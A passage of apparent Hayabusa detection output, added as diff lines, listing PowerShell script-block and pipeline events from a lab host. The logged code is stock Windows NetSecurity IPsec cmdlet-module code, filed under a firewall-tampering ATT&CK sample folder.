$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.777 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.785 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.785 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.786 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.786 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.787 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.787 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.788 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 